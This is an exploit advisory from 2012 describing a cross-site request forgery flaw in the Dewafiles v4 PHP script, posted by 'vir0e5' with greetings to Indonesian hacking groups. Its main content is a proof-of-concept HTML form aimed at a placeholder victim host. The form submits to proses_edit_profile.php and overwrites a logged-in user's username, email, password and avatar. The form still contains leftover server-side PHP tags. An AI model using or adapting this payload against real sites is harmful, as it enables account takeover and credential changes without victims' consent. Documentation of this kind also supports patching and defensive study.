# Exploit Title: Dewafiles Versi 4 - CSRF Vulnerabilities
# Author Exploit : vir0e5
# Date : 08-06-2012
# Site : http://blog.megasoft-id.com/
# Vendor : http://blog.megasoft-id.com/article/dewafiles/
# Version : Dewafiles versi 4
# Software Link: http://blog.megasoft-id.com/article/dewafiles/
# Tested on : Window and Linux
# CVE : [not yet]
[ Vulnerable File ]
~ proses_edit_profile.php
[ Exploit ]
<form enctype="multipart/form-data" action="http://korban.com/proses_edit_profile.php" method="POST">
<input type="hidden" name="id" value="<?PHP echo $id; ?>">
<p><me>Username</me></br>
<input type="text" style="width:100%" required name='username' value="<?PHP echo $_SESSION['my_name']; ?>">
<p><me>Email</me></br>
<input type="text" style="width:100%" required name='email' value="<?PHP echo $email; ?>">
<p><me>Password</me></br>
<input type="password" style="width:100%" required name='pswd' value="<?PHP echo $pswd; ?>">
<p><me>Gender</me></br>
<select style="width:100%" required name="gender">
<option><?PHP echo $gender; ?></option>
<option>Male</option>
<option>Female</option>
</select>
<p><me>Your Avatar</me></br>
<img src="<?PHP echo $photo ?>" width="60" height="60"></br>
Default Avatar : "<?PHP echo $photo; ?>"</br>
Change => <input style="width:200px" type="file" name="photo">
<p>
<input type="submit" class="button" value="Save">
</form>
*************************************************************
[+] Greetz :INDONESIAN SECURITY - TASIK CYBER - INDONESIAN CODER - EXPLOIT-ID;